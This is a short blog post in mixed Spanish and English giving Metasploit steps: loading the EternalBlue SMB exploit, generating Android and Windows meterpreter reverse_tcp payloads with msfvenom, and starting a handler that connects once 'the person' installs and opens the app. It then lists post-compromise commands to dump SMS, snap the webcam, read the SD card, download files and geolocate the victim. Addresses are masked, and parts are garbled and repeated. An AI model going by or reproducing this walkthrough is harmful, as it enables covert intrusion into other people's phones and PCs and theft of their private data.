1eros pasos
- msfconsole
- msf6 > search eternalblue
- msf6 > use exploit/windows/smb/ms17_010_eternalblue
- msf6 > show options
Con este ultimo codigo mostrara LH## Y LP### la informacion para crear el tcp_reverse
msfvenom -p a_____/meterpreter/reverse_tcp L&&&&=###.###.###.### LP&&&=#### R>___.___
msfvenom -p w_____/meterpreter/reverse_tcp LH&&&=###.###.###.### L&&&=#### F>___.___
2.- Entrar a Metasploit: msfconsole... tarda como 10 minutos (aprox) y adicional a eso hay tener todo cerrado para la upgrade...
Y configurar la entrada de la pc al dispositivo
- use exploit/multi/handler
- set PAY/=$# android/meterpreter/reverse_tcp
- set L&&&& ###.###.###.###
- set L&&&& ####
show options (need show u the lport lhost in the black window...)
after that..
[*] Started reverse TCP handler on ###.###.###.###:####
Y cuando la persona haya instalado la app y la abrá, es cuando hace conexión en la pc---
NOTA: Todo llegara a la conexión virtual.
Comandos:
dump_sms
webcam_snap
sysinfo
sdcard
download + archivo.etc
wlan_geolocate
after that..
- exploit
[*] Started reverse TCP handler on ###.###.###.###:####
Y cuando la persona haya instalado la app y la abrá, es cuando hace conexión en la pc---
NOTA: Todo llegara a la conexión virtual.
Comandos:
dump_sms
webcam_snap
sysinfo
sdcard
download + archivo.etc
wlan_geolocate
No hay comentarios:
Publicar un comentario